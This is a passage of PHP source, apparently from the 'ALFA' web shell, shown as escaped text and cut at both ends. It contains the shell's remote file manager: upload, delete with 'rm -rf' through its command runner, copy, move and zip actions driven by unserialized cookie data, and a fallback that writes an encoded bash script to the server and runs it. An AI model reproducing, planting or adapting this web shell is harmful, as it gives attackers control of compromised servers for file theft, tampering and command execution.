value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="\'.$base.\'" onChange="alfaAceChangeSetting(this,\\\'lang\\\');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,\\\'\'.$base.\'\\\');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize(\\\'\'.$base.\'\\\',\\\'+\\\', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize(\\\'\'.$base.\'\\\', \\\'-\\\', this);return false;">-</button> | \';\r\n}\r\nfunction alfaFilesMan2(){\r\n\talfahead();\r\n\tAlfaNum(8,9,10,7,6,5,4);\r\n\techo \'<div style="position:relative;" fm_id="1" id="filesman_holder_1" class="ajaxarea filesman-active-content"><div class="header"></div></div>\';\r\n\talfaFooter();\r\n}\r\nfunction copy_paste($c,$s,$d){\r\nif(@is_dir($c.$s)){\r\n@mkdir($d.$s);\r\n$h = @opendir($c.$s);\r\nwhile (($f = @readdir($h)) !== false)\r\nif (($f != ".") and ($f != ".."))\r\ncopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n} elseif(is_file($c.$s))\r\n@copy($c.$s, $d.$s);\r\n}\r\nfunction alfaFilesMan(){\r\nif(!empty ($_COOKIE[\'alfa_f\']))\r\n$_COOKIE[\'alfa_f\'] = @unserialize($_COOKIE[\'alfa_f\']);\r\nif(!empty($_POST[\'alfa1\'])){\r\nswitch($_POST[\'alfa1\']){\r\ncase \'uploadFile\':\r\n$move_cmd_file = false;\r\n$alfa_canruncmd = false;\r\nif($GLOBALS[\'glob_chdir_false\']){\r\n\t$alfa_canruncmd = _alfa_can_runCommand(true,true);\r\n\t$move_cmd_file = true;\r\n}\r\nif(_alfa_is_writable($GLOBALS[\'cwd\'])){\r\n$files = reArrayFiles($_FILES[\'f\']);\r\n$ret_files = array();\r\nforeach($files as $file){\r\nif($move_cmd_file&&$alfa_canruncmd){\r\n\talfaEx("cat \'".addslashes($file[\'tmp_name\'])."\' > \'".addslashes($_POST["c"]."/".$file[\'name\'])."\'");\r\n}else{\r\n\tif(@move_uploaded_file($file[\'tmp_name\'],$file[\'name\'])){\r\n\t\t$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file[\'name\'])):array("name" => "????");\r\n\t\t$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file[\'name\'])):array("name" => "????");\r\n\t\t$file_owner = $ow[\'name\']?$ow[\'name\']:(function_exists("fileowner")?@fileowner($file[\'name\']):"????");\r\n\t\t$file_group = $gr[\'name\']?$gr[\'name\']:(function_exists("filegroup")?@filegroup($file[\'name\']):"????");\r\n\t\t$file_modify = @date(\'Y-m-d H:i:s\', @filemtime($file[\'name\']));\r\n\t\t$file_perm = alfaPermsColor($file[\'name\']);\r\n\t\t$file_size = @filesize($file[\'name\']);\r\n\t\t$ret_files[] = array("name" => $file[\'name\'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);\r\n\t}\r\n}\r\n}\r\nif(!$move_cmd_file){\r\n\techo json_encode($ret_files);\r\n}\r\n}else{\r\n\techo "noperm";\r\n\treturn;\r\n}\r\nif(!$move_cmd_file){\r\nreturn;\r\n}\r\nbreak;\r\ncase \'mkdir\':\r\n$new_dir_cmd = false;\r\nif($GLOBALS[\'glob_chdir_false\']){\r\n\tif(_alfa_can_runCommand(true,true)){\r\n\t\tif(_alfa_is_writable($GLOBALS[\'cwd\'])){\r\n\t\t\tif(!_alfa_is_dir(trim($_POST[\'alfa2\']))){\r\n\t\t\t\talfaEx("cd \'".trim(addslashes($_POST[\'c\']))."\';mkdir \'".trim(addslashes($_POST[\'alfa2\']))."\'");\r\n\t\t\t\techo "<script>alfaShowNotification(\'".addslashes($_POST[\'alfa2\'])." created...\', \'Files manager\');</script>";\r\n\t\t\t}else{\r\n\t\t\t\techo "<script>alfaShowNotification(\'folder already existed\', \'Files manager\', \'error\');</script>";\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\techo "<script>alfaShowNotification(\'folder isnt writable !\', \'Files manager\', \'error\');</script>";\r\n\t\t}\r\n\t}else{\r\n\t\techo "<script>alfaShowNotification(\'Can\\\'t create new dir !\', \'Files manager\', \'error\');</script>";\r\n\t}\r\n}else{\r\n\tif(_alfa_is_writable($GLOBALS[\'cwd\'])){\r\n\t\tif(!_alfa_is_dir(trim($_POST[\'alfa2\']))){\r\n\t\t\tif(!@mkdir(trim($_POST[\'alfa2\']))){\r\n\t\t\t\techo "<script>alfaShowNotification(\'Can\\\'t create new dir !\', \'Files manager\', \'error\');</script>";\r\n\t\t\t}else{\r\n\t\t\t\techo "<script>alfaShowNotification(\'".addslashes($_POST[\'alfa2\'])." created...\', \'Files manager\');</script>";\r\n\t\t\t}\r\n\t\t}else{\r\n\t\t\techo "<script>alfaShowNotification(\'folder already existed\', \'Files manager\', \'error\');</script>";\r\n\t\t}\r\n\t}else{\r\n\t\techo "<script>alfaShowNotification(\'folder isnt writable !\', \'Files manager\', \'error\');</script>";\r\n\t}\r\n}\r\nbreak;\r\ncase \'delete\':\r\nfunction deleteDir($path){\r\n$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n$dh = @opendir($path);\r\nwhile(($item = @readdir($dh)) !== false){\r\n$item = $path.$item;\r\nif((basename($item) == "..") || (basename($item) == "."))\r\ncontinue;\r\n$type = @filetype($item);\r\nif ($type == "dir")\r\ndeleteDir($item);\r\nelse\r\n@unlink($item);\r\n}\r\n@closedir($dh);\r\n@rmdir($path);\r\n}\r\nif(is_array(@$_POST[\'f\']))\r\nforeach($_POST[\'f\'] as $f){\r\nif($f == \'..\')\r\ncontinue;\r\n$f = rawurldecode($f);\r\nif($GLOBALS["glob_chdir_false"]){\r\n\tif(_alfa_can_runCommand(true,true)){\r\n\t\talfaEx("rm -rf \'".addslashes($_POST[\'c\'].\'/\'.$f)."\'");\r\n\t}\r\n}else{\r\nalfaEx("rm -rf \'".addslashes($f)."\'",false,false);\r\nif(@is_dir($f))\r\ndeleteDir($f);\r\nelse\r\n@unlink($f);\r\n}\r\n}\r\nif(@is_dir(rawurldecode(@$_POST[\'alfa2\']))&&rawurldecode(@$_POST[\'alfa2\'])!=\'..\'){\r\ndeleteDir(rawurldecode(@$_POST[\'alfa2\']));\r\nalfaEx("rm -rf \'".addslashes($_POST[\'alfa2\'])."\'",false,false);\r\n}else{\r\n@unlink(rawurldecode(@$_POST[\'alfa2\']));\r\n}\r\nif($GLOBALS["glob_chdir_false"]){\r\n\t$source = rawurldecode(@$_POST[\'alfa2\']);\r\n\tif($source!=\'..\'&&!empty($source)){\r\n\t\tif(_alfa_can_runCommand(true,true)){\r\n\t\t\talfaEx("cd \'".trim(addslashes($_POST[\'c\']))."\';rm -rf \'".addslashes($source)."\'");\r\n\t\t}\r\n\t}\r\n}\r\nif(is_array($_POST[\'f\']))\r\nreturn;\r\nbreak;\r\ncase \'paste\':\r\nif($_COOKIE[\'alfa_act\'] == \'copy\'&&isset($_COOKIE[\'alfa_f\'])){\r\nforeach($_COOKIE[\'alfa_f\'] as $f)\r\ncopy_paste($_COOKIE[\'alfa_c\'],$f, $GLOBALS[\'cwd\']);\r\n}elseif($_COOKIE[\'alfa_act\'] == \'move\'&&isset($_COOKIE[\'alfa_f\'])){\r\nfunction move_paste($c,$s,$d){\r\nif(@is_dir($c.$s)){\r\n@mkdir($d.$s);\r\n$h = @opendir($c.$s);\r\nwhile (($f = @readdir($h)) !== false)\r\nif(($f != ".") and ($f != ".."))\r\ncopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n}elseif(@is_file($c.$s))\r\n@copy($c.$s, $d.$s);\r\n}\r\nforeach($_COOKIE[\'alfa_f\'] as $f)\r\n@rename($_COOKIE[\'alfa_c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n}elseif($_COOKIE[\'alfa_act\'] == \'zip\'&&isset($_COOKIE[\'alfa_f\'])){\r\nif(class_exists(\'ZipArchive\')){\r\n$zip = new ZipArchive();\r\n$zipX = "alfa_".rand(1,1000).".zip";\r\nif($zip->open($zipX, 1)){\r\n@chdir($_COOKIE[\'alfa_c\']);\r\nforeach($_COOKIE[\'alfa_f\'] as $f){\r\nif($f == \'..\')continue;\r\nif(@is_file($_COOKIE[\'alfa_c\'].$f))\r\n$zip->addFile($_COOKIE[\'alfa_c\'].$f, $f);\r\nelseif(@is_dir($_COOKIE[\'alfa_c\'].$f)){\r\n$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\'));\r\nforeach($iterator as $key=>$value){\r\n$key = str_replace(\'\\\\\',\'/\',realpath($key));\r\nif(@is_dir($key)){\r\nif(in_array(substr($key, strrpos($key,\'/\')+1),array(\'.\', \'..\')))continue;\r\n}else{$zip->addFile($key,$key);}}}}\r\n@chdir($GLOBALS[\'cwd\']);\r\n$zip->close();\r\n__alert(\'>> \'.$zipX.\' << is created...\');}}\r\n}elseif($_COOKIE[\'alfa_act\'] == \'unzip\'&&isset($_COOKIE[\'alfa_f\'])){\r\nif(class_exists(\'ZipArchive\')){\r\n$zip = new ZipArchive();\r\nforeach($_COOKIE[\'alfa_f\'] as $f) {\r\nif($zip->open($_COOKIE[\'alfa_c\'].$f)){\r\n$zip->extractTo($_COOKIE[\'alfa_cwd\']);\r\n$zip->close();}}}}\r\nunset($_COOKIE[\'alfa_f\']);\r\nbreak;\r\ndefault:\r\nif(!empty($_POST[\'alfa1\'])){\r\nif(in_array($_POST[\'alfa1\'], array("copy", "move", "zip", "unzip"))){\r\n__alfa_set_cookie(\'alfa_act\', @$_POST[\'alfa1\']);\r\n__alfa_set_cookie(\'alfa_f\', @serialize($_POST[\'f\']));\r\n__alfa_set_cookie(\'alfa_c\', @$_POST[\'c\']);\r\nreturn;\r\n}\r\n}\r\nbreak;\r\n}\r\n}\r\n$dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\nif(preg_match("#(.*)\\/\\.\\.#", $_POST[\'c\'], $res)){\r\n\t$path = explode(\'/\', $res[1]);\r\n\tarray_pop($path);\r\n\t$_POST[\'c\'] = implode(\'/\', $path);\r\n}\r\n$cmd_dir = false;\r\nif($dirContent === false){\r\n\tif(_alfa_can_runCommand(true,true)){\r\n\t\t$tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];\r\n\t\t@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));\r\n\t\tif(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){\r\n\t\t\t$bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";\r\n\t\t\t$tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);\r\n\t\t\t__alfa_set_cookie("alfachdir_bash", "true");\r\n\t\t\t__alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);\r\n\t\t}\r\n\t\t$dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa \'".addslashes(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\'])."\'");\r\n\t\t$dirContent = json_decode($dirContent, true);\r\n\t\tif(is_array($dirContent)){\r\n\t\t\tarray_pop($dirContent);\r\n\t\t\t$cmd_dir = true;\r\n\t\t}else{\r\n\t\t\t$dirContent = false;\r\n\t\t}\r\n\t}\r\n}\r\nalfahead();\r\nAlfaNum(8,9,10,7,6,5,4);\r\n$count_dirContent = @count($dirContent);\r\nif($count_dirContent > 300){\r\n\t@$_COOKIE["alfa_limited_files"] = 100;\r\n}\r\n$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : \'name\';\r\n$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;\r\n$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;\r\n$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : \'asc\';\r\n$files_page_count = 1;\r\nif($alfa_limited_files > 0){\r\n\t$files_page_count = ceil($count_dirContent/$alfa_limited_files);\r\n\tif($files_page_count > 1){\r\n\t\t$files_page_count++;\r\n\t}\r\n}\r\necho \'<div><div class="filters-holder"><span>Filter: </span><input style="color:#25ff00;" autocomplete="off" type="text" id="regex-filter" name="name-filter" onkeydown="doFilterName(this);"><span style="margin-left:10px">Sort By: </span><select name="sort_files" onchange="sortBySelectedValue(this,\\\'alfa_sort_by\\\');" style="color:#25ff00;"><option value="name" \'.($alfa_sort_by == \'name\'?\'selected\':\'\').\'>Name</option><option value="size" \'.($alfa_sort_by == \'size\'?\'selected\':\'\').\'>Size</option><option value="modify" \'.($alfa_sort_by == \'modify\'?\'selected\':\'\').\'>Modify</option></select><span style="margin-left:10px">Direction: </span><select name="direction_filesman" onChange="sortBySelectedValue(this,\\\'alfa_filesman_direction\\\')" style="color:#25ff00;"><option value="asc" \'.($alfa_filesman_direction == \'asc\'?\'selected\':\'\').\'>Ascending</option><option value="desc" \'.($alfa_filesman_direction == \'desc\'?\'selected\':\'\').\'>Descending</option></select><span style="margin-left:10px;"> limit: </span><input style="text-align:center;width: 40px;color:#25ff00;" type="text" name="limited_number" value="\'.$alfa_limited_files.\'" oninput="this.value=this.value.replace(/[^0-9]/g,\\\'\\\');setCookie(\\\'alfa_limited_files\\\', this.value, 2012);"><span style="margin-left:10px;">Files Count: <b style="color:#25ff00;">\'.($count_dirContent-1).\'</b></span></div><div class="header">\';\r\nif($dirContent == false){\r\necho \'<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>\';\r\nalfaFooter();\r\nreturn;\r\n}\r\nglobal $sort;\r\n$sort = array(\'name\', 1);\r\nif(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){\r\n\t$sort[0] = $_COOKIE["alfa_sort_by"];\r\n}\r\nif(!empty($_POST[\'alfa1\'])) {\r\nif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'alfa1\'], $match))\r\n$sort = array($match[1], (int)$match[2]);\r\n}\r\nif($alfa_files_page_number > ($files_page_count-1)){\r\n\t$alfa_files_page_number = 1;\r\n}\r\n$checkbox_rand = rand(11111, 99999);\r\necho "<form onsubmit=\'fc(this);return false;\' name=\'files\' method=\'post\'><table id=\'filemanager_table\' width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'><tr><th width=\'13px\'><div class=\'myCheckbox\' style=\'padding-left:0px;\'><input type=\'checkbox\' id=\'mchk".$checkbox_rand."\' onclick=\'checkBox(this);\' class=\'chkbx\'><label for=\'mchk".$checkbox_rand."\'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";\r\n$dirs = $files = array();\r\n$n = $count_dirContent;\r\nif($n > $alfa_limited_files && $alfa_limited_files > 0){\r\n\t$n = ($alfa_limited_files * $alfa_files_page_number);\r\n\tif($n > $count_dirContent){\r\n\t\t$n = $count_dirContent;\r\n\t}\r\n}\r\n$i = 0;\r\nif($alfa_limited_files > 0 && $alfa_files_page_number > 1){\r\n\t$i = $alfa_limited_files * ($alfa_files_page_number - 1);\r\n}\r\n$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);\r\n$cmd_dir_backp = "";\r\nfor(;$i<$n;$i++){\r\nif($cmd_dir){\r\n$filename = $dirContent[$i]["name"];\r\n$file_owner = $dirContent[$i]["owner"];\r\n$file_group = $dirContent[$i]["group"];\r\n$file_modify = @date(\'Y-m-d H:i:s\', $dirContent[$i]["modify"]);\r\n$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);\r\n$file_size = $dirContent[$i]["size"];\r\nif(substr($dirContent[$i]["name"], 0 ,1) == "/"){\r\n$file_path = $dirContent[$i]["name"];\r\n$dirContent[$i]["name"] = "..";\r\n$filename = $dirContent[$i]["name"];\r\n}else{\r\n$file_path = $GLOBALS[\'cwd\']."/".$dirContent[$i]["name"];\r\n}\r\n}else{\r\n$filename = $dirContent[$i];\r\n$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS[\'cwd\'].$filename)):array("name" => "????");\r\n$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS[\'cwd\'].$filename)):array("name" => "????");\r\n$file_owner = $ow[\'name\']?$ow[\'name\']:(function_exists("fileowner")?@fileowner($GLOBALS[\'cwd\'].$filename):"????");\r\n$file_group = $gr[\'name\']?$gr[\'name\']:(function_exists("filegroup")?@filegroup($GLOBALS[\'cwd\'].$filename):"????");\r\n$file_modify = @date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $filename));\r\n$file_perm = alfaPermsColor($GLOBALS[\'cwd\'].$filename);\r\n$file_size = @filesize($GLOBALS[\'cwd\'].$filename);\r\n$file_path = $GLOBALS[\'cwd\'].$filename;\r\n}\r\n$tmp = array(\'name\' => $filename,\r\n\'path\' => $file_path,\r\n\'modify\' => $file_modify,\r\n\'perms\' => $file_perm,\r\n\'size\' => $file_size,\r\n\'owner\' => $file_owner,\r\n\'group\' => $file_group\r\n);\r\nif($filename == ".." && !$cmd_dir){\r\n\t$tmp["path"] = str_replace("\\\\", "/", realpath($file_path));\r\n}\r\nif(!$cmd_dir){\r\nif(@is_file($file_path)){\r\n$arr_mrg = array(\'type\' => \'file\');\r\nif(@is_link($file_path)){\r\n$arr_mrg["link"] = readlink($tmp[\'path\']);\r\n}\r\n$files[] = array_merge($tmp, $arr_mrg);\r\n}elseif(@is_link($file_path)){\r\n$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n}elseif(@is_dir($file_path)&& ($filename != ".")){\r\n$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n}\r\n}else{\r\n\tif($dirContent[$i]["type"]=="file"){\r\n\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t}else{\r\n\t\tif($dirContent[$i]["name"] != "."){\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t\t}\r\n\t}\r\n}\r\n}\r\n$GLOBALS[\'sort\'] = $sort;\r\nfunction alfaCmp($a, $b) {\r\nif($GLOBALS[\'sort\'][0] != \'size\')\r\nreturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\nelse\r\nreturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n}\r\nusort($files, "alfaCmp");\r\nusort($dirs, "alfaCmp");\r\nif(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){\r\n\tif($_COOKIE["alfa_filesman_direction"] == \'desc\'){\r\n\t\t$files = array_reverse($files);\r\n\t\t$dirs = array_reverse($dirs);\r\n\t}\r\n}\r\n$files = array_merge($dirs, $files);\r\n$l=0;\r\n$cc=0;\r\nforeach($files as $f){\r\n$f[\'name\'] = htmlspecialchars($f[\'name\']);\r\n$newname = mb_strlen($f[\'name\'], \'UTF-8\')>60?mb_substr($f[\'name\'], 0, 60, \'utf-8\').\'...\':$f[\'name\'];\r\n$checkbox = \'checkbox_\'.$checkbox_rand.$cc;\r\n$raw_name = rawurlencode($f[\'name\']);\r\n$icon = $GLOBALS[\'DB_NAME\'][\'show_icons\']?\'<img src="\'.findicon($f[\'name\'],$f[\'type\']).\'" width="30" height="30">\':\'\';\r\n$style = $GLOBALS[\'DB_NAME\'][\'show_icons\']?\'position:relative;display:inline-block;bottom:12px;\':\'\';\r\necho \'<tr class="fmanager-row" id="tr_row_\'.$cc.\'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="\'.$raw_name.\'" class="chkbx" id="\'.$checkbox .\'"><label for="\'.$checkbox .\'"></label></div></td><td id="td_row_\'.$cc.\'">\'.$icon.\'<div style="\'.$style.\'"><a row="\'.$cc.\'" id="id_\'.$cc.\'" class="main_name" onclick="\'.(($f[\'type\']==\'file\')?\'editor(\\\'\'.$raw_name.\'\\\',\\\'auto\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\');" href="#action=fileman&path=\'.$GLOBALS[\'cwd\'].\'&file=\'.$raw_name.\'" fname="\'.$raw_name.\'" ftype="file" path="\'.$GLOBALS[\'cwd\'].\'" opt_title="\'.$f[\'link\'].\'" \'.(isset($f[\'link\'])?\'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"\':\'\').\'>\'.($GLOBALS[\'cwd\'].$f[\'name\']==$GLOBALS[\'__file_path\']?"<span class=\'shell_name\' style=\'font-weight:unset;\'>".$f[\'name\']."</span>":htmlspecialchars($newname)):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" href="#action=fileman&path=\'.$f[\'path\'].\'" fname="\'.$raw_name.\'" ftype="folder" path="\'.$GLOBALS[\'cwd\'].\'" opt_title="\'.$f[\'link\'].\'" \'.(isset($f[\'link\'])?\'onmouseover="showSymlinkPath(this,event);" onmouseout="hideSymlinkPath(this,event);"\':\'\').\'><b>| \' . htmlspecialchars($f[\'name\']) . \' |</b>\').\'</a></td></div><td><span style="font-weight:unset;" class="main_size">\'.(($f[\'type\']==\'file\')?(isset($f[\'link\'])?\'[L] \':\'\').alfaSize($f[\'size\']):$f[\'type\']).\'</span></td><td><span style="font-weight:unset;" class="main_modify">\'.$f[\'modify\'].\'</span></td><td><span style="font-weight:unset;" class="main_owner_group">\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</span></td><td><a id="id_chmode_\'.$cc.\'" href=javascript:void(0) onclick="editor(\\\'\'.$raw_name.\'\\\',\\\'chmod\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\')">\'.\r\n$f[\'perms\'].\'</td><td><a id="id_rename_\'.$cc.\'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\\\'\'.$raw_name.\'\\\', \\\'rename\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\')">R</a> <a id="id_touch_\'.$cc.\'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\\\'\'.$raw_name.\'\\\', \\\'touch\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a id="id_edit_\'.$cc.\'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\\\'\'.$raw_name.\'\\\', \\\'edit\\\',\\\'\\\',\\\'\\\',\\\'\\\',\\\'\'.$f[\'type\'].\'\\\')">E</a> <a id="id_download_\'.$cc.\'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\\\'FilesTools\\\',null,\\\'\'.$raw_name.\'\\\', \\\'download\\\')">D</a>\':\'\').\'<a id="id_delete_\'.$cc.\'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\\\'Are You Sure For Delete # \'.addslashes(rawurldecode($f[\'name\'])).\' # ?\\\'); chk ? g(\\\'FilesMan\\\',null,\\\'delete\\\', \\\'\'.$raw_name.\'\\\') : \\\'\\\';"> X </a></td></tr>\';\r\n$l = $l?0:1;\r\n$cc++;\r\n}\r\necho "<tr id=\'filemanager_last_tr\'><td colspan=7>\r\n<input type=hidden name=a value=\'FilesMan\'>\r\n<input type=hidden name=c value=\'".htmlspecialchars(($GLOBALS[\'glob_chdir_false\']?$_POST[\'c\']:$GLOBALS[\'cwd\']))."\'>\r\n<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\r\n<select id=\'tools_selector\' name=\'alfa1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\' selected>Delete</option><option value=\'zip\'>Add 2 Compress (zip)</option><option value=\'unzip\'>Add 2 Uncompress (zip)</option><option value=\'paste\'>Paste / Zip / Unzip </option></select>\r\n<input type=\'submit\' value=\' \'>\r\n</form></table><div class=\'pages-holder\'><div class=\'pages-number\'>".$page_builder."</div></div></div></div>";\r\nalfafooter();\r\n}\r\nfunction get_pagination_links($current_page, $total_pages){\r\n    $links = "";\r\n    if ($total_pages >= 1 && $current_page <= $total_pages) {\r\n\t\t$links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number\\"><<</a>";\r\n\t\t$selected_page = "";\r\n\t\tif($current_page == 1){\r\n\t\t\t$selected_page = " active-page-number";\r\n\t\t}\r\n        $links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number".$selected_page."\\">1</a>";\r\n        $i = max(2, $current_page - 5);\r\n        if ($i > 2)\r\n            $links .= "<a class=\\"page-number\\">...</a>";\r\n        for (; $i < min($current_page + 6, $total_pages); $i++) {\r\n\t\t\tif($i == $current_page){\r\n\t\t\t\t$selected_page = " active-page-number";\r\n\t\t\t}else{\r\n\t\t\t\t$selected_page = "";\r\n\t\t\t}\r\n            $links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number".$selected_page."\\">{$i}</a>";\r\n        }\r\n        if ($i != $total_pages)\r\n            $links .= "<a class=\\"page-number\\">...</a>";\r\n\t\t$selected_page = " last-page-number";\r\n\t\tif($current_page == $total_pages){\r\n\t\t\t$selected_page .= " active-page-number";\r\n\t\t}\r\n        $links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number".$selected_page."\\">{$total_pages}</a>";\r\n\t\t$links .= "<a onclick=\\"pageChangedFilesMan(this);\\" class=\\"page-number\\">>></a>";\r\n    }\r\n    return $links;\r\n}\r\nfunction alfaFilesTools(){\r\nalfahead();\r\necho \'<div class="filestools" style="height: 100%;">\';\r\nif(isset($_POST[\'alfa1\']))$_POST[\'alfa1\'] = rawurldecode($_POST[\'alfa1\']);\r\n$alfa1_decoded = $_POST[\'alfa1\'];\r\n$chdir_fals = false;\r\nif(!@chdir($_POST[\'c\'])){\r\n\t$chdir_fals = true;\r\n\t$_POST[\'alfa1\'] = $_POST["c"]."/".$_POST["alfa1"];\r\n\t$alfa_canruncmd = _alfa_can_runCommand(true,true);\r\n\tif($alfa_canruncmd){\r\n\t\t$slashed_alfa1 = addslashes($_POST[\'alfa1\']);\r\n\t\t$file_info = explode(":", alfaEx(\'stat -c "%F:%U:%G:%s:%Y:0%a:%A" "\'.$slashed_alfa1.\'"\'));\r\n\t\t$perm_color_class = alfaEx("if [[ -w 